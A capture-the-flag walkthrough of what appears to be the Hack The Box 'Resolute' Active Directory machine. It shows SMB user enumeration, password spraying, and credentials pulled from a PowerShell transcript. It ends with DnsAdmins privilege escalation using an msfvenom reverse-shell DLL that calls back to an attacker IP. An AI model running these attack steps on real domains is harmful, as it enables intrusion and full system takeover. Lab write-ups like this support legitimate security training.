Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| # Nmap 7.95 scan initiated Mon Jun 9 15:48:33 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up, received reset ttl 127 (0.057s latency).
Scanned at 2025-06-09 15:48:35 +08 for 28s
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open tcpwrapped syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-09 07:34:01Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2025-06-09T07:34:09
|_ start_date: 2025-06-09T07:25:05
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 52471/tcp): CLEAN (Couldn't connect)
| Check 2 (port 4297/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55070/udp): CLEAN (Timeout)
| Check 4 (port 37482/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h05m19s, deviation: 4h02m31s, median: -14m41s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2025-06-09T00:34:08-07:00
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 9 15:49:03 2025 -- 1 IP address (1 host up) scanned in 29.48 seconds
|
SMB Enumeration
Null User Logins
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u '' -p '' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating shares: STATUS_ACCESS_DENIED
|
Non-Exist user logins
1
2
3
4
5
6
7
8
9
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u 'DoesNotExist' -p '' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DoesNotExist: STATUS_LOGON_FAILURE
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u 'DoesNotExist' -p 'w' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DoesNotExist:w STATUS_LOGON_FAILURE
|
List Users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u '' -p '' --users
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating domain users using dc ip 10.10.10.169: NTLM needs domain\username and a password
SMB 10.10.10.169 445 RESOLUTE [*] Trying with SAMRPC protocol
SMB 10.10.10.169 445 RESOLUTE [+] Enumerated domain user(s)
SMB 10.10.10.169 445 RESOLUTE megabank.local\Administrator Built-in account for administering the computer/domain
SMB 10.10.10.169 445 RESOLUTE megabank.local\Guest Built-in account for guest access to the computer/domain
SMB 10.10.10.169 445 RESOLUTE megabank.local\krbtgt Key Distribution Center Service Account
SMB 10.10.10.169 445 RESOLUTE megabank.local\DefaultAccount A user account managed by the system.
SMB 10.10.10.169 445 RESOLUTE megabank.local\ryan
SMB 10.10.10.169 445 RESOLUTE megabank.local\marko Account created. Password set to Welcome123!
SMB 10.10.10.169 445 RESOLUTE megabank.local\sunita
SMB 10.10.10.169 445 RESOLUTE megabank.local\abigail
SMB 10.10.10.169 445 RESOLUTE megabank.local\marcus
SMB 10.10.10.169 445 RESOLUTE megabank.local\sally
SMB 10.10.10.169 445 RESOLUTE megabank.local\fred
SMB 10.10.10.169 445 RESOLUTE megabank.local\angela
SMB 10.10.10.169 445 RESOLUTE megabank.local\felicia
SMB 10.10.10.169 445 RESOLUTE megabank.local\gustavo
SMB 10.10.10.169 445 RESOLUTE megabank.local\ulf
SMB 10.10.10.169 445 RESOLUTE megabank.local\stevie
SMB 10.10.10.169 445 RESOLUTE megabank.local\claire
SMB 10.10.10.169 445 RESOLUTE megabank.local\paulo
SMB 10.10.10.169 445 RESOLUTE megabank.local\steve
SMB 10.10.10.169 445 RESOLUTE megabank.local\annette
SMB 10.10.10.169 445 RESOLUTE megabank.local\annika
SMB 10.10.10.169 445 RESOLUTE megabank.local\per
SMB 10.10.10.169 445 RESOLUTE megabank.local\claude
SMB 10.10.10.169 445 RESOLUTE megabank.local\melanie
SMB 10.10.10.169 445 RESOLUTE megabank.local\zach
SMB 10.10.10.169 445 RESOLUTE megabank.local\simon
SMB 10.10.10.169 445 RESOLUTE megabank.local\naoki
|
We found a bunch of domain users, and the description shows the password is initially set to Welcome123!. We collect all this information into creds.txt, users.txt, and password.txt.
Then, we password spray to see who has the default password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u user.txt -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
|
It shows that melanie has the default password!
1
2
3
4
5
6
7
8
9
10
11
12
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u 'melanie' -p 'Welcome123!' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares
SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark
SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------
SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin
SMB 10.10.10.169 445 RESOLUTE C$ Default share
SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC
SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share
SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server share
|
Good!
WinRM Enumeration
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u 'melanie' -p 'Welcome123!'
SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
|
Post-Exploitation
QuickCheck
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| *Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\melanie\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
abigail Administrator angela
annette annika claire
claude DefaultAccount felicia
fred Guest gustavo
krbtgt marcus marko
melanie naoki paulo
per ryan sally
simon steve stevie
sunita ulf zach
The command completed with one or more errors.
|
Files Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
| *Evil-WinRM* PS C:\> Get-ChildItem -Path C:\ -Include *.txt -force -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\Program Files\VMware\VMware Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2018 4:12 AM 548162 open_source_licenses.txt
Directory: C:\Program Files\Windows Defender
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:12 AM 1091 ThirdPartyNotices.txt
Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:14 AM 3110 about_BeforeEach_AfterEach.help.txt
-a---- 7/16/2016 6:14 AM 6396 about_Mocking.help.txt
-a---- 7/16/2016 6:14 AM 5056 about_Pester.help.txt
-a---- 7/16/2016 6:14 AM 5945 about_should.help.txt
-a---- 7/16/2016 6:14 AM 1156 about_TestDrive.help.txt
Directory: C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:15 AM 3110 about_BeforeEach_AfterEach.help.txt
-a---- 7/16/2016 6:15 AM 6396 about_Mocking.help.txt
-a---- 7/16/2016 6:15 AM 5056 about_Pester.help.txt
-a---- 7/16/2016 6:15 AM 5945 about_should.help.txt
-a---- 7/16/2016 6:15 AM 1156 about_TestDrive.help.txt
Directory: C:\ProgramData\VMware\VMware CAF\pme\data\input\persistence\protocol\amqpBroker_default
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:48 AM 79 uri_amqp.txt
-a---- 9/25/2019 10:48 AM 63 uri_tunnel.txt
Directory: C:\ProgramData\VMware\VMware Tools\Unity Filters
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2018 4:13 AM 1433 adobeflashcs3.txt
-a---- 9/4/2018 4:13 AM 1712 adobephotoshopcs3.txt
-a---- 9/4/2018 4:13 AM 588 googledesktop.txt
-a---- 9/4/2018 4:13 AM 1265 microsoftoffice.txt
-a---- 9/4/2018 4:13 AM 907 vistasidebar.txt
-a---- 9/4/2018 4:13 AM 152 visualstudio2005.txt
-a---- 9/4/2018 4:13 AM 3739 vmwarefilters.txt
-a---- 9/4/2018 4:13 AM 399 win7gadgets.txt
Directory: C:\ProgramData\VMware\VMware Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:49 AM 4285 manifest.txt
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Directory: C:\Users\All Users\VMware\VMware CAF\pme\data\input\persistence\protocol\amqpBroker_default
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:48 AM 79 uri_amqp.txt
-a---- 9/25/2019 10:48 AM 63 uri_tunnel.txt
Directory: C:\Users\All Users\VMware\VMware Tools\Unity Filters
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2018 4:13 AM 1433 adobeflashcs3.txt
-a---- 9/4/2018 4:13 AM 1712 adobephotoshopcs3.txt
-a---- 9/4/2018 4:13 AM 588 googledesktop.txt
-a---- 9/4/2018 4:13 AM 1265 microsoftoffice.txt
-a---- 9/4/2018 4:13 AM 907 vistasidebar.txt
-a---- 9/4/2018 4:13 AM 152 visualstudio2005.txt
-a---- 9/4/2018 4:13 AM 3739 vmwarefilters.txt
-a---- 9/4/2018 4:13 AM 399 win7gadgets.txt
Directory: C:\Users\All Users\VMware\VMware Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:49 AM 4285 manifest.txt
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/9/2025 2:37 AM 34 user.txt
Directory: C:\Windows\Microsoft.NET\Framework\v4.0.30319
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:15 AM 20324 ThirdPartyNotices.txt
Directory: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:14 AM 20324 ThirdPartyNotices.txt
Directory: C:\Windows\System32\catroot2
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/4/2019 4:38 AM 140035 dberr.txt
Directory: C:\Windows\System32\WindowsPowerShell\v1.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/20/2016 5:52 PM 3568 default.help.txt
Directory: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/20/2016 5:52 PM 3568 default.help.txt
|
We found PSTranscripts which is interesting…
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
| *Evil-WinRM* PS C:\> cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
|
We got ryan password which is Serv3r4Admin4cc123!.
1
2
3
4
5
6
7
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'
SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
|
Good!
Ryan Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| *Evil-WinRM* PS C:\Users\ryan\Desktop> ls
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
*Evil-WinRM* PS C:\Users\ryan\Desktop>
|
Ryan Groups
Note that ryan belongs to DNSADMINS, which is abnormal for a normal user. By searching for abusing DNSADMINS, we can do the following:
First, we create a malicious dll used to inject into the target machine:
1
2
| ┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f dll -o evil.dll
|
Then, we upload this dll to the target machine, then use dnscmd to inject the malicious dll
1
2
3
4
| *Evil-WinRM* PS C:\Users\ryan\Desktop> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Desktop\evil.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
|
Then, we restart the dns service to trigger the malicious payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| *Evil-WinRM* PS C:\Users\ryan\Desktop> sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Desktop> sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3400
FLAGS :
|
Last, profit
1
2
3
4
5
6
| C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
|
